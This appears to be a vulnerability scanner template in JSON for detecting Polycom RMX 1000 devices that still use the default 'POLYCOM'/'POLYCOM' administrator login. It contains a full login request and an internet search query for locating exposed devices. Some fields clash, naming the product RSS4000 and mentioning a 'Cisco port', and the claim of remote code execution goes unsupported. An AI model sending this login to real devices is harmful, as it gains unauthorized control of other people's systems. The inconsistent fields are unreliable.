{
  "Name": "Polycom RMX 1000 Default Credentials",
  "Description": "The Polycom RMX 1000 administrator 'POLYCOM' has a password that is set to the default value of 'POLYCOM'. As a result, anyone with access to the Cisco port can trivially gain full access to the machine via arbitrary remote code execution. ",
  "Product": "Polycom-RSS4000",
  "Homepage": "https://www.poly.com/",
  "DisclosureDate": "2012-04-23",
  "Author": "gobysec@gmail.com",
  "FofaQuery": "title=\"Polycom RMX 1000\"",
  "GobyQuery": "title=\"Polycom RMX 1000\"",
  "Level": "3",
  "Impact": "Remote attacker can use this default to control the server.",
  "Recommendation": "It is imperative to change default manufacturer passwords and restrict network access to critical and important systems.",
  "References": [
    "https://fofa.so/"
  ],
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "Tips",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
	{
         "Request": {
           "data": "_dst_in_xml_raw=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CRMX1000_UI+version%3D%221.0.0.0%22%3E%09%3CFROM_PAGE+id%3D%22login%22%3E%09%09%3CSESSION_ID+value%3D%22%22+%2F%3E%09%09%3C_CGI_NO_REFRESH+value%3D%22NO%22+%2F%3E%09%09%3CSEL_LANG+value%3D%22en%22+%2F%3E%09%09%3CIS_CGI+value%3D%22YES%22+%2F%3E%09%09%3CDEV_IP_V4+value%3D%22%22+%2F%3E%09%09%3CLOGINNAME+value%3D%22POLYCOM%22+%2F%3E%09%09%3CPASSWD+value%3D%22504f4c59434f4d%22+%2F%3E%09%09%3Crmx1000_ip+value%3D%22127.0.0.1%22+%2F%3E%09%09%3Cproxy_log_ip+value%3D%22%22+%2F%3E%09%09%3C_CGI_UI_LANG+value%3D%22en%22+%2F%3E%09%09%3Ccfg_ui_hide+value%3D%22YES%22+%2F%3E%09%09%3C_CGI_TIME+value%3D%22Fri+Mar+12+2021+16%3A14%3A34+GMT%2B0800+%28%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4%29%22+%2F%3E%09%3C%2FFROM_PAGE%3E%3C%2FRMX1000_UI%3E",
           "data_type": "text",
           "follow_redirect": false,
           "header": {
             "Content-Type": "application/x-www-form-urlencoded"
           },
           "method": "POST",
           "uri": "/cgi-bin/rmx1000_cgi"
         },
         "ResponseTest": {
           "checks": [
             {
               "bz": "",
               "operation": "contains",
               "type": "item",
               "value": "ACT_STATUS",
               "variable": "$body"
             }
           ],
           "operation": "AND",
           "type": "group"
         },
         "SetVariable": []
    }
  ],
  "ExploitSteps": null,
  "Tags": [
    "defaultaccount", "iot"
  ],
  "CVEIDs": null,
  "CVSSScore": "10.0",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": ["Polycom-RMX1000"]
  },
  "Disable": false
}